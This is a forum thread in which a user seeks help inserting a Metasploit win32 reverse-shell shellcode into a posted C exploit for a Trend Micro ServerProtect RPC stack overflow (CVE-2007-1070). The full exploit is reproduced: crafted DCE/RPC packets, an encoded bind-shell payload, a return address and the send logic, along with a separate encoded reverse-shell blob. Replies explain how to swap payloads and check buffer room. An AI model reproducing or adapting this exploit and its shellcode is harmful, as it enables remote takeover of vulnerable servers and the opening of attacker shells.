add a shellcode to a sourcecode


add a shellcode to a sourcecode

Post by slipparse »

I know this is a stupid question but I'll ask anyway :P

I would like to add a reverse shell to a source file that only includes a bind shell. Suppose the source is written in C. I know I can get a generic reverse shell from sites like Metasploit, so I'll take this one.


/* win32_reverse -  EXITFUNC=seh Size=312 Encoder=Pex http://metasploit.com */
/* NOTE(review): opaque, encoder-obfuscated byte blob. The header line above is
 * the only description of its behaviour and nothing about it can be verified
 * from this listing. Length check: 19 rows of 16 bytes plus one row of 8
 * = 312 bytes, which agrees with the stated Size. */
char shellcode[] =
"\x29\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f"
"\x61\x88\x6f\x83\xeb\xfc\xe2\xf4\xc3\x0b\x63\x22\xd7\x98\x77\x90"
"\xc0\x01\x03\x03\x1b\x45\x03\x2a\x03\xea\xf4\x6a\x47\x60\x67\xe4"
"\x70\x79\x03\x30\x1f\x60\x63\x26\xb4\x55\x03\x6e\xd1\x50\x48\xf6"
"\x93\xe5\x48\x1b\x38\xa0\x42\x62\x3e\xa3\x63\x9b\x04\x35\xac\x47"
"\x4a\x84\x03\x30\x1b\x60\x63\x09\xb4\x6d\xc3\xe4\x60\x7d\x89\x84"
"\x3c\x4d\x03\xe6\x53\x45\x94\x0e\xfc\x50\x53\x0b\xb4\x22\xb8\xe4"
"\x7f\x6d\x03\x1f\x23\xcc\x03\x2f\x37\x3f\xe0\xe1\x71\x6f\x64\x3f"
"\xc0\xb7\xee\x3c\x59\x09\xbb\x5d\x57\x16\xfb\x5d\x60\x35\x77\xbf"
"\x57\xaa\x65\x93\x04\x31\x77\xb9\x60\xe8\x6d\x09\xbe\x8c\x80\x6d"
"\x6a\x0b\x8a\x90\xef\x09\x51\x66\xca\xcc\xdf\x90\xe9\x32\xdb\x3c"
"\x6c\x22\xdb\x2c\x6c\x9e\x58\x07\x35\x61\x88\x6c\x59\x09\x8c\x69"
"\x59\x32\x01\x8e\xaa\x09\x64\x96\x95\x01\xdf\x90\xe9\x0b\x98\x3e"
"\x6a\x9e\x58\x09\x55\x05\xee\x07\x5c\x0c\xe2\x3f\x66\x48\x44\xe6"
"\xd8\x0b\xcc\xe6\xdd\x50\x48\x9c\x95\xf4\x01\x92\xc1\x23\xa5\x91"
"\x7d\x4d\x05\x15\x07\xca\x23\xc4\x57\x13\x76\xdc\x29\x9e\xfd\x47"
"\xc0\xb7\xd3\x38\x6d\x30\xd9\x3e\x55\x60\xd9\x3e\x6a\x30\x77\xbf"
"\x57\xcc\x51\x6a\xf1\x32\x77\xb9\x55\x9e\x77\x58\xc0\xb1\xe0\x88"
"\x46\xa7\xf1\x90\x4a\x65\x77\xb9\xc0\x16\x74\x90\xef\x09\x78\xe5"
"\x3b\x3e\xdb\x90\xe9\x9e\x58\x6f";
So how do I insert all this into a full exploit's code? Let's take, for example, a recent exploit I've just found on milw0rm. I would be really grateful if anybody could edit this code so I'll notice the differences.


/* 
 * Copyright (c) 2007 devcode
 *
 *
 *			^^ D E V C O D E ^^
 *
 * Trend Micro ServerProtect eng50.dll Stack Overflow
 * [CVE-2007-1070]
 *
 *
 * Description:
 *    A boundary error within a function in eng50.dll can be
 *    exploited to cause a stack-based buffer overflow via a
 *    specially crafted RPC request to the SpntSvc.exe service.
 *
 * Hotfix/Patch:
 *    http://www.trendmicro.com/download/product.asp?productid=17
 *
 * Vulnerable systems:
 *    ServerProtect for Windows 5.58
 *    ServerProtect for EMC 5.58
 *    ServerProtect for Network Appliance Filer 5.61
 *    ServerProtect for Network Appliance Filer 5.62
 *
 * Tested on:
 * 	  Microsoft Windows 2000 SP4
 * 
 *    This is a PoC and was created for educational purposes only. The
 *    author is not held responsible if this PoC does not work or is 
 *    used for any other purposes than the one stated above.
 *
 * Notes:
 *	  <3 TippingPoint for technical details. Had this made few days after
 *    disclosure (few months back), was rlsd on r1918 about a week ago 
 *    and I notice trend micro exploit reports on isc.sans.org. DIDNT KNOW
 *    I WAS THIS HOT DAYUM
 *
 *
 */
#include <iostream>
#include <windows.h>
 
#pragma comment( lib, "ws2_32.lib" )
 
/* 25288888-bd5b-11d1-9d53-0080c83a5c2c v1.0 */
/* DCE/RPC bind PDU, 72 bytes (4 rows of 16 plus 8). main() sends it with
 * sizeof - 1, so the string's NUL terminator is excluded. Bytes 32..47 are
 * the UUID above in little-endian field order, followed by 01 00 00 00 —
 * presumably the interface UUID and the "v1.0" from the comment; the bytes
 * 48 00 00 00 at offset 8 (= 72) look like the PDU length. Neither field
 * is documented here — confirm against the DCE/RPC spec. */
unsigned char uszDceBind[] =
	"\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00"
	"\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" 
	"\x88\x88\x28\x25\x5B\xBD\xD1\x11\x9D\x53\x00\x80\xC8\x3A\x5C\x2C" 
	"\x01\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00"
	"\x2B\x10\x48\x60\x02\x00\x00\x00";
 
/* rpc_opnum_0 */
/* DCE/RPC request PDU header, 48 bytes (3 rows of 16). main() copies it to
 * offset 0 of the 2056-byte uszPacket with plain sizeof (49 bytes, i.e. the
 * NUL terminator too). Bytes 24..39 are the same UUID as in uszDceBind, and
 * the bytes 08 08 00 00 at offset 8 equal 2056 = sizeof(uszPacket) —
 * presumably the fragment length field; confirm against the spec. */
unsigned char uszDceCall[] =
	"\x05\x00\x00\x83\x10\x00\x00\x00\x08\x08\x00\x00\x01\x00\x00\x00"
	"\xE0\x07\x00\x00\x00\x00\x00\x00\x88\x88\x28\x25\x5B\xBD\xD1\x11"
	"\x9D\x53\x00\x80\xC8\x3A\x5C\x2C\x04\x00\x03\x00\xD0\x07\x00\x00";
 
/* win32_bind -  EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov http://metasploit.com */
/* NOTE(review): opaque, encoder-obfuscated byte blob; only the header line
 * above describes it and nothing in it can be audited from this listing.
 * Length check: 21 rows of 16 bytes plus one row of 6 = 342, matching the
 * stated Size. The LPORT=4444 in the header is the port main() prints at
 * the end. main() copies it with sizeof - 1 (terminator excluded). */
unsigned char uszShellcode[] =
	"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x76\xd2\xab"
	"\x1f\x83\xeb\xfc\xe2\xf4\x8a\xb8\x40\x52\x9e\x2b\x54\xe0\x89\xb2"
	"\x20\x73\x52\xf6\x20\x5a\x4a\x59\xd7\x1a\x0e\xd3\x44\x94\x39\xca"
	"\x20\x40\x56\xd3\x40\x56\xfd\xe6\x20\x1e\x98\xe3\x6b\x86\xda\x56"
	"\x6b\x6b\x71\x13\x61\x12\x77\x10\x40\xeb\x4d\x86\x8f\x37\x03\x37"
	"\x20\x40\x52\xd3\x40\x79\xfd\xde\xe0\x94\x29\xce\xaa\xf4\x75\xfe"
	"\x20\x96\x1a\xf6\xb7\x7e\xb5\xe3\x70\x7b\xfd\x91\x9b\x94\x36\xde"
	"\x20\x6f\x6a\x7f\x20\x5f\x7e\x8c\xc3\x91\x38\xdc\x47\x4f\x89\x04"
	"\xcd\x4c\x10\xba\x98\x2d\x1e\xa5\xd8\x2d\x29\x86\x54\xcf\x1e\x19"
	"\x46\xe3\x4d\x82\x54\xc9\x29\x5b\x4e\x79\xf7\x3f\xa3\x1d\x23\xb8"
	"\xa9\xe0\xa6\xba\x72\x16\x83\x7f\xfc\xe0\xa0\x81\xf8\x4c\x25\x81"
	"\xe8\x4c\x35\x81\x54\xcf\x10\xba\xba\x43\x10\x81\x22\xfe\xe3\xba"
	"\x0f\x05\x06\x15\xfc\xe0\xa0\xb8\xbb\x4e\x23\x2d\x7b\x77\xd2\x7f"
	"\x85\xf6\x21\x2d\x7d\x4c\x23\x2d\x7b\x77\x93\x9b\x2d\x56\x21\x2d"
	"\x7d\x4f\x22\x86\xfe\xe0\xa6\x41\xc3\xf8\x0f\x14\xd2\x48\x89\x04"
	"\xfe\xe0\xa6\xb4\xc1\x7b\x10\xba\xc8\x72\xff\x37\xc1\x4f\x2f\xfb"
	"\x67\x96\x91\xb8\xef\x96\x94\xe3\x6b\xec\xdc\x2c\xe9\x32\x88\x90"
	"\x87\x8c\xfb\xa8\x93\xb4\xdd\x79\xc3\x6d\x88\x61\xbd\xe0\x03\x96"
	"\x54\xc9\x2d\x85\xf9\x4e\x27\x83\xc1\x1e\x27\x83\xfe\x4e\x89\x02"
	"\xc3\xb2\xaf\xd7\x65\x4c\x89\x04\xc1\xe0\x89\xe5\x54\xcf\xfd\x85"
	"\x57\x9c\xb2\xb6\x54\xc9\x24\x2d\x7b\x77\x99\x1c\x4b\x7f\x25\x2d"
	"\x7d\xe0\xa6\xd2\xab\x1f";
 
/* Print the banner and the command-line syntax to stdout. */
void usage( ) {
	static const char banner[] =
		"\n\t\tTrend Micro ServerProtect Stack Overflow\n"
		"\t\t  (c) 2007 devcode | Compiled by Derka\n\n"
		"usage: tmicro.exe <ip> <port>\n";
	fputs( banner, stdout );
}
 
/*
 * Entry point. argv[1] is the target address (dotted quad), argv[2] the TCP
 * port. Connects, sends uszDceBind, waits for one reply, then sends a single
 * 2056-byte request assembled from uszDceCall, uszShellcode and the two
 * literals below, with every other byte filled with 0x41. Returns -1 on any
 * failure (usage, Winsock init, socket, connect, send, recv), 0 otherwise.
 */
int main( int argc, char **argv ) {
	WSADATA wsaData;
	SOCKET sConnect;
	SOCKADDR_IN sockAddr;
	char szRecvBuf[512];            /* reply buffer; its contents are never inspected */
	unsigned char uszPacket[2056];  /* the request PDU, sent as one buffer */
	int nRet;
 
	if ( argc < 3 ) {
		usage( );
		return -1;
	}
 
	/* NOTE(review): WSAStartup has no matching WSACleanup on any return path. */
	if ( WSAStartup( MAKEWORD( 2, 0 ), &wsaData ) != NO_ERROR ) {
		printf("[-] Unable to startup winsock\n");
		return -1;
	}
 
	sConnect = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
	if ( sConnect == INVALID_SOCKET ) {
		printf("[-] Invalid socket\n");
		return -1;
	}
 
	sockAddr.sin_family = AF_INET;
	/* NOTE(review): neither inet_addr (INADDR_NONE on a malformed address)
	 * nor atoi (0 on a non-numeric port) is checked, so a typo in argv[1]
	 * or argv[2] is only noticed, indirectly, when connect() fails. */
	sockAddr.sin_addr.s_addr = inet_addr( argv[1] );	
	sockAddr.sin_port = htons( atoi( argv[2] ) );
 
	printf("[+] Connecting to %s:%s\n", argv[1], argv[2] );
	nRet = connect( sConnect, (SOCKADDR *)&sockAddr, sizeof( sockAddr ) );
	if ( nRet == SOCKET_ERROR ) {
		printf("[-] Cannot connect to server\n");
		closesocket( sConnect );
		return -1;
	}
 
	/* "- 1" excludes the string literal's NUL terminator. */
	printf("[+] Sending DCE Bind packet...\n");
	nRet = send( sConnect, (const char *)uszDceBind, sizeof( uszDceBind ) - 1, 0 );
	if ( nRet  == SOCKET_ERROR ) {
		printf("[-] Cannot send\n");
		closesocket( sConnect );
		return -1;
	}
 
	/* Wait for the bind reply; only its presence is checked, not its content. */
	nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );
	if ( nRet <= 0 ) {
		printf("[-] Recv failed\n");
		closesocket( sConnect );
		return -1;
	}
 
	/* Fill first, so every byte not explicitly written below is 0x41 ('A'). */
	memset( uszPacket, 0x41, sizeof( uszPacket ) );
	/* NOTE(review): this copy has no "- 1", so it also writes the literal's
	 * NUL terminator at offset 48 (uszDceCall is 48 bytes). The next memcpy
	 * starts at offset 48 and overwrites that byte, so the inconsistency
	 * with the other two copies is harmless but worth making uniform. */
	memcpy( uszPacket, (const char *)uszDceCall, sizeof( uszDceCall ) );
	memcpy( uszPacket+48, uszShellcode, sizeof( uszShellcode ) - 1 );
	/* call ebx, 0x6574131C, TmRpcSrv.dll */
	/* jmp ebx, 0x7C4E4A66, kernel32.dll */
	memcpy( uszPacket + 1198, "\x1C\x13\x74\x65", 4 );
	memcpy( uszPacket + 2048, "\xD0\x07\x00\x00\xD0\x07\x00\x00", 8 );
 
	/* Whole 2056-byte buffer in one send; a short send is not detected. */
	printf("[+] Sending DCE Request packet...\n");
	nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 );
	if ( nRet == SOCKET_ERROR ) {
		printf("[-] Cannot send\n");
		closesocket( sConnect );
		return -1;
	}
 
	/* 4444 is the LPORT from the uszShellcode header comment. */
	printf("[+] Check shell on port 4444 :)\n");	
	/* Blocks for one more reply; nRet is assigned here but never examined. */
	nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );	
	closesocket( sConnect );
	return 0;
}

// milw0rm.com [2007-09-06]
Sorry for making you scroll through all these long source listings :P


Post by shamir »

Wait, my bad — it's written in C. Sorry, man. :wink:


Post by computathug »

*off topic* sorry to bump your post slipparse
shamir wrote:A shell code huh???? 8O
Can you please tell us all what this completely obsolete post, which counts purely as spam, is about? This is seriously beyond a joke now; I and other members have commented on this before, and the reply I get by PM is "only trying to be nice".

If you don't understand something, either start a new topic or wait until somebody who understands the question replies; then read it again and you might understand the topic posted.

now can this get back on track to the original post :!:


Post by shamir »

What I'm trying to say is: what is the meaning of the line of code he wrote? :wink:


Post by Gogeta70 »

Please keep the posts on topic, if you want to discuss something with computathug, shamir, then take it to a PM.


Post by bubzuru »

That exploit already has the bind-shell shellcode in it :?

Normally you can just swap the shellcode, but not always, because there might not be enough room in the buffer to store the new shellcode.


Post by slipparse »

Yeah, I know this code includes a bind shell, but I would like to change it to a reverse shell. So all you're saying is that I only need to replace the shellcode and, if I'm lucky (read: the buffer overflow is big enough), I might get it working?

Don't I also need to change other bits of the code to match the options of a reverse shell?


void usage( ) {
	printf("\n\t\tTrend Micro ServerProtect Stack Overflow\n"
			"\t\t\t(c) 2007 devcode\n\n"
			"usage: tmicro.exe <ip> <port>\n");
.................


	memset( uszPacket, 0x41, sizeof( uszPacket ) );
	memcpy( uszPacket, (const char *)uszDceCall, sizeof( uszDceCall ) );
	memcpy( uszPacket+48, uszShellcode, sizeof( uszShellcode ) - 1 );
	/* call ebx, 0x6574131C, TmRpcSrv.dll */
	/* jmp ebx, 0x7C4E4A66, kernel32.dll */
	memcpy( uszPacket + 1198, "\x1C\x13\x74\x65", 4 );
	memcpy( uszPacket + 2048, "\xD0\x07\x00\x00\xD0\x07\x00\x00", 8 );
 
	printf("[+] Sending DCE Request packet...\n");
	nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 );
	if ( nRet == SOCKET_ERROR ) {
		printf("[-] Cannot send\n");
		closesocket( sConnect );
		return -1;
	}
 
	printf("[+] Check shell on port 4444 :)\n");	
	nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );	
	closesocket( sConnect );
	return 0;
}


Post by bubzuru »

slipparse wrote:Yeah, I know this code includes a bind shell, but I would like to change it to a reverse shell. So all you're saying is that I only need to replace the shellcode and, if I'm lucky (read: the buffer overflow is big enough), I might get it working?

Don't I also need to change other bits of the code to match the options of a reverse shell?


void usage( ) {
	printf("\n\t\tTrend Micro ServerProtect Stack Overflow\n"
			"\t\t\t(c) 2007 devcode\n\n"
			"usage: tmicro.exe <ip> <port>\n");
.................


	memset( uszPacket, 0x41, sizeof( uszPacket ) );
	memcpy( uszPacket, (const char *)uszDceCall, sizeof( uszDceCall ) );
	memcpy( uszPacket+48, uszShellcode, sizeof( uszShellcode ) - 1 );
	/* call ebx, 0x6574131C, TmRpcSrv.dll */
	/* jmp ebx, 0x7C4E4A66, kernel32.dll */
	memcpy( uszPacket + 1198, "\x1C\x13\x74\x65", 4 );
	memcpy( uszPacket + 2048, "\xD0\x07\x00\x00\xD0\x07\x00\x00", 8 );
 
	printf("[+] Sending DCE Request packet...\n");
	nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 );
	if ( nRet == SOCKET_ERROR ) {
		printf("[-] Cannot send\n");
		closesocket( sConnect );
		return -1;
	}
 
	printf("[+] Check shell on port 4444 :)\n");	
	nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );	
	closesocket( sConnect );
	return 0;
}
I think you might have to edit a bit of the code.

Also, there might not be enough room for the shellcode. I suggest you get the program you want to examine and OllyDbg:

http://www.ollydbg.de/odbg110.zip
